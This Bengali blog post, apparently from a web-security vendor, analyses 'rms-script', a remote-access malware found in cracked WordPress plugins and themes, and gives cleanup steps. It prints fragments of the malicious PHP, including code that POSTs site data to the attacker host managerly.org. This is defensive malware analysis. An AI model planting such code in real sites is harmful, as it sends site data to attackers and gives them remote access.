[ফিক্স] WordPress rms-script রিমোট অ্যাক্সেস ম্যালওয়্যার

সম্প্রতি, কিছু ওয়ার্ডপ্রেস ওয়েবসাইটে একটি দূরবর্তী অ্যাক্সেস ম্যালওয়্যার রয়েছে যা একটি বহিরাগত সাইটে দূরবর্তী অ্যাক্সেস প্রদান করে। এই ম্যালওয়্যারের অবস্থানটি পরে পাওয়া গেছে wp-content/mu-plugins ফোল্ডারে কিছু র্যান্ডম পিএইচপি ফাইল। এমনকি জনপ্রিয় ফ্রি ওয়ার্ডপ্রেস সিকিউরিটি প্লাগইন ব্যবহার করে ওয়েবসাইটটি স্ক্যান করার পরেও কোনো অসঙ্গতি ধরা পড়েনি। এই ম্যালওয়্যার সম্পর্কে আরও জানতে এবং কীভাবে এটি ঠিক করবেন তা জানতে, পড়ুন।

rms-স্ক্রিপ্ট ম্যালওয়্যার কি করে

প্রথমে, মনে হচ্ছে আপনার ওয়ার্ডপ্রেস সাইট একটি অদ্ভুত ত্রুটি দেখাচ্ছে। এই ত্রুটিটি দূরবর্তী অ্যাক্সেস ম্যালওয়্যারের কারণে ঘটছে এবং এটি wp-content/mu-plugins ফোল্ডারে চিহ্নিত করা যেতে পারে, বিশেষত নীচের ছবিতে হাইলাইট করা সন্দেহজনক PHP ফাইলগুলি:

সাইটটিতে ম্যালওয়্যার স্ক্যান করার পরেও, রিমোট অ্যাক্সেস ম্যালওয়্যারের কোনও চিহ্ন ছিল না। যাইহোক, পিএইচপি ফাইলগুলির আরও পরীক্ষায়, এটি পাওয়া গেছে যে কোডটি একটি বহিরাগত সাইট, managerly.org-এ দূরবর্তী লগইন অ্যাক্সেস দিচ্ছে।

আপনি এখানে পাওয়া সম্পূর্ণ দূষিত rms-স্ক্রিপ্ট পিএইচপি কোডটি দেখতে পারেন।

ম্যালওয়্যারে আরও খনন করা

সন্দেহজনক PHP ফাইলগুলির (rms-script-mu-plugin.php এবং rms-script-ini.php) রেফারেন্সের জন্য সাইটের প্লাগইনগুলির মাধ্যমে ব্রাউজ করার পরে, এটি পাওয়া গেছে যে ক্র্যাক প্লাগইনগুলিতে এই ম্যালওয়্যার থাকতে পারে৷ এই ফাইলগুলির ট্রেস ডিভি থিম ফোল্ডারেও পাওয়া গেছে - যার মধ্যে নমুনা সাইটের একটি বাতিল সংস্করণ ছিল। ফোল্ডারটি মুছে ফেলা হলে, স্ক্রিপ্টগুলি চালানো বন্ধ হয়ে যায়।

এখানে একটি ক্র্যাক প্লাগইনে পাওয়া কোডের একটি অংশ রয়েছে যার জন্য দুটি ক্ষতিকারক PHP স্ক্রিপ্ট প্রয়োজন:

require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);

এখানে কোড স্নিপেটটি পূর্ববর্তীটি অনুসরণ করছে:

$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
 'method' => 'POST',
 'timeout' => 15,
 'redirection' => 15,
 'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
 'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

এই কোডটি যে ওয়েবসাইটটি চালু আছে সেখান থেকে ডেটা সংগ্রহ করে এবং এটিকে বহিরাগত সাইটে পাঠায় বলে মনে হয় - সারমর্মে, এটি একটি দূরবর্তী অ্যাক্সেস ম্যালওয়্যার যা আপনার ডেটা managerly.org-এ পাঠায়। এটি অত্যন্ত ক্ষতিকারক হতে পারে - পরবর্তী বিভাগে এটি সম্পর্কে আরও।

managerly.org-এ আরও বিশ্লেষণ নিম্নলিখিত তথ্যগুলি প্রকাশ করে:

• নিবন্ধক সংস্থা: উক্সি ইলিয়ান এলএলসি
• নিবন্ধক রাজ্য/প্রদেশ: ফুজিয়ান
• নিবন্ধনকারী দেশ: সিএন
• নাম সার্ভার: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
• DNSSEC: স্বাক্ষরবিহীন

নিবন্ধনকারী সংস্থার নাম অনুসন্ধান করা Reddit পোস্টগুলিতেও প্রচুর হিট দেয়। দেখে মনে হচ্ছে এই এলএলসি জাল এবং অন্যান্য কেলেঙ্কারীতেও রয়েছে। এখানে কয়েকটি অনুসন্ধান ফলাফল রয়েছে:

এই ম্যালওয়্যারটি কেন বিপজ্জনক

একটি দূরবর্তী অ্যাক্সেস ম্যালওয়্যার আক্রমণে, আক্রমণকারীরা আপনার ওয়েবসাইটে অ্যাক্সেস পেতে পারে এবং তাদের দূষিত প্রচারণার জন্য এটি ব্যবহার করতে পারে। আপনি আপনার সাইটের নিয়ন্ত্রণ হারাতে পারেন এবং আক্রমণকারীর কাছে সংবেদনশীল ডেটা প্রকাশ হতে পারে।

এখানে, আক্রমণকারীরা আরএমএস-স্ক্রিপ্ট রিমোট অ্যাক্সেস ম্যালওয়্যারের মাধ্যমে ওয়ার্ডপ্রেস অ্যাকাউন্টগুলি মাইন করার চেষ্টা করছে! আপনি আপনার পাসওয়ার্ড পরিবর্তন করলেও এই হ্যাকটি সম্ভবত আপনার ওয়েবসাইটের নিরাপত্তাকে বাইপাস করতে পারে।

সতর্কতার একটি শব্দ - এই সমস্যাটির পুনরাবৃত্তি হওয়ার উচ্চ সম্ভাবনা রয়েছে, কারণ বিনামূল্যের সুরক্ষা সরঞ্জামগুলি এই ম্যালওয়্যার সনাক্ত করতে সক্ষম নয়৷ সুতরাং, অনুগ্রহ করে নিশ্চিত করুন যে কোনো সন্দেহজনক ফাইলের জন্য আপনার ওয়েবসাইটটি পুঙ্খানুপুঙ্খভাবে পরীক্ষা করুন এবং সম্ভব হলে আপনার ওয়েবসাইটের নিরাপত্তা কঠোর করুন।

আপনার ইনস্টল করা থাকলে wp-contents/mu-plugins ফোল্ডার এবং Divi থিম ফোল্ডারে কোনো ক্ষতিকারক PHP ফাইল আছে কিনা তাও পরীক্ষা করে দেখুন।

কিভাবে আপনার ওয়ার্ডপ্রেস সাইট ঠিক করবেন

1. পরিষ্কার করার আগে আপনার সাইটটির একটি ব্যাকআপ নিন:

আপনি এটি পরিষ্কার করার সময় ব্যবহারকারীরা যাতে সংক্রামিত পৃষ্ঠাগুলি দেখতে না পারে সেজন্য ওয়েবসাইটটিকে অফলাইনে রাখার পরামর্শ দেওয়া হয়। সমস্ত মূল ফাইল এবং ডাটাবেসের একটি ব্যাকআপ নিতে ভুলবেন না। একটি সংকুচিত ফাইল বিন্যাসে ব্যাকআপ নেওয়া নিশ্চিত করুন, যেমন .zip.

2. আপনার সাইট থেকে কোনো বাতিল বা ক্র্যাক করা প্লাগইনগুলি সরান:

মনে হচ্ছে অনেক প্লাগইন এবং থিম - বিশেষ করে ডিভি থিম - যা এই দূরবর্তী অ্যাক্সেস ম্যালওয়্যারটি ক্র্যাক বা বাতিল করেছে৷ ওয়ার্ডপ্রেস ক্লাবের এই ধরনের ক্র্যাক প্লাগইন এবং থিমগুলিতে এই ম্যালওয়্যারটির বিশদ বিবরণ এই স্ট্যাক ওভারফ্লো উত্তরে পাওয়া যাবে। তাই আপনার সাইট থেকে কোনো নাল বা ফাটল করা প্লাগইন মুছে ফেলার বিষয়টি নিশ্চিত করুন এবং তারপর ম্যালওয়্যার স্ক্যান চালান! শুধুমাত্র জেনুইন প্লাগইন এবং থিম ব্যবহার করুন এবং আপনার সাইট যাতে দুর্বল না হয় তা নিশ্চিত করতে সেগুলি আপডেট করতে থাকুন।

3. সমস্ত সন্দেহজনক ফোল্ডার এবং ফাইল মুছুন:

আপনার সাইটে সম্ভাব্য দূষিত হতে পারে এমন ফাইলগুলি পরীক্ষা করুন এবং সেগুলি মুছুন৷

সম্পর্কিত নির্দেশিকা – WordPress ম্যালওয়্যার অপসারণ

4. একটি ম্যালওয়্যার স্ক্যান চালান:

ম্যালওয়্যার ক্রমাগত বিকশিত হচ্ছে, কিন্তু ম্যালওয়্যার স্ক্যানারগুলিও তাই। ম্যালওয়্যার এবং দূষিত ফাইলগুলির জন্য আপনার ওয়েব সার্ভারে একটি ম্যালওয়্যার স্ক্যান চালানো সর্বদা একটি ভাল ধারণা৷ আপনি আপনার ওয়েব হোস্ট দ্বারা প্রদত্ত cPanel-এ 'ভাইরাস স্ক্যানার' টুল ব্যবহার করতে পারেন, অথবা Astra Pro প্ল্যানের সাথে বিশেষজ্ঞ ম্যালওয়্যার ক্লিনআপ পেতে পারেন। আমাদের ম্যালওয়্যার স্ক্যানার দূষিত PHP ফাইলগুলিকে পতাকাঙ্কিত করে!

WordPress wp-content/mu-plugin রিমোট অ্যাক্সেস ম্যালওয়্যার:উপসংহার

একটি রিমোট অ্যাক্সেস ম্যালওয়্যার সম্প্রতি ওয়ার্ডপ্রেস সাইটগুলিতে পাওয়া গেছে, বেশিরভাগই যারা বাতিল বা ক্র্যাকড প্লাগইন ব্যবহার করে। যদিও এই ম্যালওয়্যারটি অনেক জনপ্রিয় ম্যালওয়্যার স্ক্যানার দ্বারা ফ্ল্যাগ অফ করা হয়নি, সেগুলি ক্রমাগত আপডেট করা হচ্ছে এবং আপনার সাইট প্রভাবিত হতে পারে বলে সন্দেহ হলে একটি স্ক্যান চালানো একটি ভাল ধারণা। উপরন্তু, শুধুমাত্র প্রকৃত প্লাগইন এবং থিম ব্যবহার করা এবং সেগুলিকে আপডেট রাখা আপনার সাইট সুরক্ষিত থাকে তা নিশ্চিত করার একটি দুর্দান্ত উপায়।

অস্ট্রা সম্পর্কে ৷

Astra হল অপরিহার্য ওয়েব নিরাপত্তা স্যুট যা আপনার জন্য হ্যাকার, ইন্টারনেট হুমকি এবং বটদের বিরুদ্ধে লড়াই করে। ওয়ার্ডপ্রেস, ওপেনকার্ট, ম্যাজেন্টো ইত্যাদির মতো জনপ্রিয় CMS-এ চলমান আপনার ওয়েবসাইটগুলির জন্য আমরা সক্রিয় নিরাপত্তা প্রদান করি। হ্যাকিং এবং ম্যালওয়্যার সংক্রমণ পরিস্থিতি সম্পর্কিত আপনার সমস্ত প্রশ্নের সাথে আপনাকে সাহায্য করার জন্য আমাদের প্রযুক্তিগত সহায়তা দল সারা বছর 24×7 উপলব্ধ থাকে।